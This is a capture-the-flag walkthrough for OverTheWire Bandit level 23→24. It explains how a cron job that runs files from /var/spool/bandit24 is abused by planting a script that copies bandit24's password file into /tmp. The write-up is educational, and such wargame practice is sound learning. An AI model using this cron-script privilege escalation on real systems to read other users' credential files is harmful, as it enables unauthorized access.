OverTheWire: Bandit Level 23 → 24
Writeup for OverTheWire Bandit CTF Level 23 → 24
Let us first create a directory for our files in “/tmp”. OverTheWire gives users permission to create files and directories in this directory. You can name it anything. I call the directory “abc123”. Run the following commad:
mkdir /tmp/abc123Now, from the question we learn that there is a cron job running. We can check it out at “/etc/cron.d/” folder. Run the following command:
ls /etc/cron.d/You can see several cronjobs listed. For us, only the one corresponding to bandit24 username is relevant. We can view it by using the following command:
cat /etc/cron.d/cronjob_bandit24We get the following output:
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/nullOkay, so we know that this cron job is running a script “/usr/bin/cronjob_bandit24.sh” every minute. We can also note that both stdout and stderr output goes to “/dev/null” which means we won’t be able to see any logs when the script runs . We can view the script by writing the following command:
cat /usr/bin/cronjob_bandit24.shWe get the following output:
#!/bin/bash
myname=$(whoami) cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
if [ "$i" != "." -a "$i" != ".." ];
then
echo "Handling $i"
owner="$(stat --format "%U" ./$i)"
if [ "${owner}" = "bandit23" ];
then
timeout -s 9 60 ./$i
fi
rm -f ./$i
fi
done
So from the script, we can make out the following points →
- It reads the directory whose name is the username of the user who ran the script. Since we know the cron job is created by bandit24 and this cronjob executes the script, so the directory that will be read here is “/var/spool/bandit24”.
- It reads it and execute all the scripts owned by bandit23 with a timeout of 60 seconds.
- This indicates that if we were to inject some script in the directory then it is going to be executed with same priviledges as bandit24.
- After executing the file, it deletes it.
OverTheWire keeps password for every level in the directory “/etc/bandit_pass” but only the username corresponding to a level can read that level’s password. Other’s don’t have the permission. So if we wanted to read bandit24’s password, what we can do is use the previous bullet points. We can write a script named “my.sh”. Let it contain the following code:
#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/abc123/passIt simply reads the bandit24 password file and write it to the file named “pass” in our directory “abc123”. If we put this script in “/var/spool/bandit24” directory then the cronjob will execute it with same priviledges as bandit24 because the cronjob is created by bandit24, hence reading of password file will work.
Okay, so now we just copy the script into the directory “/var/spool/bandit24” by running the following command:
cp /tmp/abc123/my.sh /var/spool/bandit24/my.shAlso we need to give the bandit24 the permission to execute the script as well as the permission to write in the directory “abc123” . By default it does not have that permission.
chmod o+x /var/spool/bandit24/my.sh
chmod o+w /tmp/abc123Note that we need to be fast in doing the above steps because the cron job is running every minute and it deletes everything inside /var/spool/bandit24 so it might happen that we copy the script into the directory but before we get to change the permissions, the script gets deleted.
Now we wait for a minute. And then, Voila!
We can see the password in the file “/tmp/abc123/pass”.
